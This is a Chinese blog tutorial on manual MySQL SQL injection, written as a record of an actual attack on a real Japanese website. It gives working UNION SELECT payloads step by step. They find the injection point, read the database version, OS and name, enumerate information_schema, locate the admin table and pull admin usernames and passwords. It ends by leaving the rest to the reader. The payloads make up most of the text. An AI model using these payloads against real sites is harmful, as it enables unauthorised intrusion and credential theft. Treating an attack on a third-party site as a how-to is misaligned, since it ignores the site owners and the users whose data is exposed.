MySQL手工注入实战

原创

晨风灬 2017-07-18 12:07:05 ©著作权

文章标签 MySQL 网络安全 sql注入渗透测试实战教程 文章分类 网络安全

©著作权归作者所有：来自51CTO博客作者晨风灬的原创作品，谢绝转载，否则将追究法律责任

实战记录，日本某站

注入点 and 语句测试

and1=1 返回正常，and=2跳回首页，可能过滤了

MySQL手工注入实战_渗透测试

MySQL手工注入实战_sql注入_02

用 ’ 测试返回错误页面

判断为注入点

MySQL手工注入实战_MySQL_03

order by语句查询字段数

测试字段数为9

and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句，查询显示位

2、3为显示位

使用注入函数可爆出数据库版本信息

and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统

and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1

MySQL手工注入实战_网络安全_11

库1<information_schema>

爆出第二个数据库，limit1,1即可

发现第二个数据库就是当前库

MySQL手工注入实战_实战教程_12

库2<henecia>

and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES where TABLE_SCHEMA=（库2名字16进制）limit 0,1

爆第一个表名，数据库名要转换为16进制

MySQL手工注入实战_网络安全_13

表1 <TM_ADMIN_MEMBER>敏感表

改为limit 1,1可爆第二个表名

MySQL手工注入实战_sql注入_14

表2<TM_BANNER_MASTER>

and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1

使用group_concat(table_name)可以一次爆出全部表名

MySQL手工注入实战_实战教程_15

已得到敏感表名TM_ADMIN_MEMBER，接下来爆字段

表名要转换为16进制

and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME=<转换为16进制的表名> limit 0,1

MySQL手工注入实战_实战教程_16

推荐使用这种方法

and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME=<转换为16进制的表名> limit 0,1

#COLUMN 翻译为列

用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出

敏感字段<admin_id、login_id、login_pwd>

有敏感表名，敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名

接下来的自行脑补.......

欢迎各位大神指点批评！

晨风

上一篇：MSSQL手工注入

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯